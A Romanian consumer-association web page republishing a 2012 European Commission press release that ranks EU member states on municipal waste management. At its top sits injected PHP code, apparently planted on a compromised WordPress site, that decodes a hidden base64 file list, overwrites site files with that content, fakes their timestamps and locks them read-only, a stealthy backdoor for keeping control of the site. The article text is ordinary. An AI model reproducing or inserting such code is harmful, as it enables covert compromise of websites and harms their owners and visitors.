$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } InfoCons: Mediu: un nou tabel cu medalii pentru gestionarea deșeurilor – O noua atitudine

Un nou raport despre modul în care statele membre își gestionează deșeurile municipale evidențiază diferențe surprinzătoare la nivelul UE.Raportul clasifică cele 27 de state membre în funcție de 18 criterii, cu ajutorul unor stegulețe verzi, portocalii și roșii în domenii precum: deșeurile totale reciclate, costul eliminării deșeurilor și încălcări ale legislației europene.

Tabloul de bord rezultat face parte dintr-un studiu aflat în desfășurare care va ajuta statele membre să își îmbunătățească performanța în materie de gestionare a deșeurilor.În fruntea tabelului se situează Austria, Belgia, Danemarca, Germania, Țările de Jos și Suedia, țări dintre care niciuna nu are mai mult de 2 stegulețe roșii.Modelul este însă inversat la celălalt capăt al clasamentului, unde stegulețele verzi sunt rare.

Domnul Janez Potočnik, comisarul pentru mediu, a declarat:„Imaginea rezultată din acest exercițiu îmi confirmă cele mai serioase preocupări.Multe state membre contină să depoziteze la gropile de gunoi cantități uriașe de deșeuri municipale – cea mai nepotrivită opțiune de gestionare a deșeurilor –, în ciuda existenței unor alternative mai bune și în pofida disponibilității fondurilor structurale necesare pentru a finanța opțiuni mai favorabile.Se îngroapă resurse valoroase, se pierd beneficii economice potențiale, nu se creează locuri de muncă în sectorul gestionării deșeurilor, iar sănătatea umană și mediul au de suferit.Este un lucru greu de justificat în condițiile actuale ale economiei noastre.”
Statele membre cu cele mai mari lacune în privința punerii în aplicare a legislației în domeniu sunt Bulgaria, Republica Cehă, Cipru, Estonia, Grecia, Italia, Letonia, Lituania, Malta, Polonia, România și Slovacia.Deficiențele includ strategii incomplete sau inexistente de prevenire a producerii deșeurilor, lipsa stimulentelor pentru a evita depozitarea deșeurilor la gropile de gunoi, precum și o infrastructură neadecvată de gestionare a deșeurilor.Faptul că se recurge masiv la depozitarea deșeurilor la gropile de gunoi înseamnă că unele opțiuni mai bune de gestionare a deșeurilor, precum refolosirea și reciclarea, sunt în mod sistematic subexploatate.În consecință, perspectiva este deficitară.
În schimb, Austria, Belgia, Danemarca, Germania, Țările de Jos și Suedia dispun de sisteme complexe de colectare a deșeurilor și depozitează la gropile de gunoi mai puțin de 5 % din deșeurile pe care le produc.Aceste țări dețin sisteme de reciclare bine dezvoltate și o capacitate suficientă de tratare și au performanțe bune în privința deșeurilor biodegradabile.În general, statele menționate combină cu succes în politicile lor de gestionare a deșeurilor instrumente juridice, administrative și economice.
O serie de state membre au înregistrat progrese rapide în sensul renunțării la depozitarea deșeurilor la gropile de gunoi, ajungând practic până la eliminarea acesteia.Chiar și statele cu cele mai bune performanțe se confruntă însă cu o serie de provocări, precum intensificarea prevenirii producerii de deșeuri și soluționarea problemei supracapacității în sectorul incinerării, care ar putea împiedica reciclarea și crea necesitatea de a importa deșeuri pentru alimentarea incineratoarelor.

 

Următoarele etape

Comisia utilizează acest raport pentru pregătirea foilor de parcurs pentru cele zece state membre cu cele mai slabe rezultate.Acestea vor fi discutate cu autoritățile naționale în cadrul unor seminare bilaterale care vor avea loc în această toamnă la Praga, începând cu 19 septembrie.Foile de parcurs vor contribui la difuzarea bunelor practici și vor conține recomandări specifice cu privire la modalitățile de a îmbunătăți gestionarea deșeurilor cu ajutorul instrumentelor economice, juridice și administrative, precum și al fondurilor structurale ale UE.

Comisia intenționează să utilizeze fonduri structurale ale UE urmărind mai îndeaproape obiectivele politicii UE în materie de gestionare a deșeurilor.Cadrul financiar multianual (CFM) propus pentru perioada 2014-2020 ar trebui să garanteze că banii UE sunt investiți în proiecte de gestionare a deșeurilor doar dacă sunt îndeplinite în prealabil anumite condiții, inclusiv elaborarea Planurilor de gestionare a deșeurilor în conformitate cu Directiva-cadru privind deșeurile și cu ierarhia deșeurilor, favorizarea prevenirii, reutilizării și reciclării în raport cu incinerarea, cu valorificare energetică, și recurgerea ca ultimă soluție la depozitarea la gropile de gunoi sau la incinerare fără valorificare energetică.

 

Context

Un studiu recent pregătit pentru Comisie estimează că punerea în aplicare integrală a legislației UE privind deșeurile ar putea genera economii de 72 de miliarde de euro pe an, ar putea crește cifra de afaceri anuală a UE în sectorul gestionării și reciclării deșeurilor cu 42 de miliarde de euro și ar putea crea mai mult de 400 000 de locuri de muncă până în 2020.

Asociaţia Naţională pentru Protecţia Consumatorilor şi Promovarea  Programelor şi Strategiilor din România – A.N.P.C.P.P.S. România – o9atitudine ! – InfoCons, unica organizaţie din România cu drepturi depline în Consumers International, membră fondatoare a Federaţiei Asociaţiilor de Consumatori.

 

 

Sursa: Comisia Europeana – Comunicat de pres

Bruxelles, 7 august 2012

By o9admin